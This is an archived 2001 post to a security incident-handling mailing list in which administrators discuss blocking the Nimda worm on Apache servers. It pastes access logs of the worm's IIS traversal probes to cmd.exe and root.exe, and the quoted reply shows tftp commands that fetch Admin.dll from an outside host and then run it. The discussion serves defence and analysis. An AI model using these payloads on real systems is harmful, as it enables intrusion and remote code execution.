-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I'm not having that experience.. I've thrown the following into my httpd.conf: (Server version: Apache/1.3.14) # bounce nimda RedirectMatch 415 (.*)\.exe(.*)$ and I still only get 16 probes per host. However, three of the probes don't return with 415 for some reason... same three probes on every "attack".. two return 400's and one returns 404... thoughts? xx - - [19/Sep/2001:16:13:46 -0700] "GET /scripts/root.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:13:48 -0700] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:13:55 -0700] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:02 -0700] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:03 -0700] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:49 -0700] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:50 -0700] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:14:52 -0700] "GET /msadc/..%255c../..%255c../..%255c/ ..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:03 -0700] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:05 -0700] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 291 xx - - [19/Sep/2001:16:15:12 -0700] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:19 -0700] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:21 -0700] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 xx - - [19/Sep/2001:16:15:25 -0700] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 275 xx - - [19/Sep/2001:16:15:26 -0700] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 xx - - [19/Sep/2001:16:15:29 -0700] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 415 316 - -- David Leitko dvdat_private http://www.leitko.net PGP Fingerprint 9B5B 8853 2AA9 4546 211C 21DC 7D98 A825 8C88 0862 -----BEGIN PGP SIGNATURE----- Version: PGPfreeware 7.0.3 for non-commercial use <http://www.pgp.com> iQA/AwUBO6kqk32YqCWMiAhiEQLPAQCg+Dcb17ClDmyhVIvR0duh1yEIssgAoNCS UUvRPcjiX9husckmZ3ErAU27 =0z4A -----END PGP SIGNATURE----- > -----Original Message----- > From: Michael Halls [mailto:mhallsat_private] > Sent: Wednesday, September 19, 2001 1:21 PM > To: George Milliken > Cc: Incidentsat_private > Subject: RE: Anyone????? FW: Concept Virus(CV) V.5 - Quick analysis > update > > On Wed, 19 Sep 2001, George Milliken wrote: > > > Maybe something like a rewrite rule > > > > RewriteEngine On > > RewriteRule ^.*/cmd.exe.* [FL] > > RewriteRule ^.*/root.exe.* [FL] > > > > This will send "forbidden" to systems trying those URLs and will stop > > rewrite processing. > > > > Actually this may increase the load to those servers. When the worm's > probe recieves anything other than a 404 (not found) it makes several other > requests to the server to exploit the machines. It first trys to copy the > Admin.dll to the c:, d:, and e: drives: > > 216.156.1.151 - - [19/Sep/2001:12:30:13 -0700] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 51 "-" "-" > 216.156.1.151 - - [19/Sep/2001:12:31:28 -0700] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20c:\Admin.dll > HTTP/1.0" 200 51 "-" "-" > 216.156.1.151 - - [19/Sep/2001:12:32:43 -0700] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20d:\Admin.dll > HTTP/1.0" 200 51 "-" "-" > 216.156.1.151 - - [19/Sep/2001:12:33:58 -0700] "GET > /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20216.22.197.29%20GET%20Admin.dll%20e:\Admin.dll > HTTP/1.0" 200 51 "-" "-" > > The worm then attempts to execute the Admin.dll > > 216.156.1.151 - - [19/Sep/2001:12:35:13 -0700] "GET > /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 51 "-" "-" > > This has the effect of increasing the traffic about 5 fold. > > The worm also will continue to probe/exploit the machine after it gets a > "hit" so a machine that returns 403 (forbidden) for each of the 16 attacks > would get about 80 hits to their website from each machine. Playing > around with some cgi scripts that tarpit requests it looks like the worm's > tcp connections time out after 1 minute 30 seconds without a response. By > sleeping my script for about 1 minute 15 seconds I can hold a machine in > my "tarpit" for about an hour and a half. > > Does anybody know if this thing is single threaded? ---------------------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Wed Sep 19 2001 - 17:14:46 PDT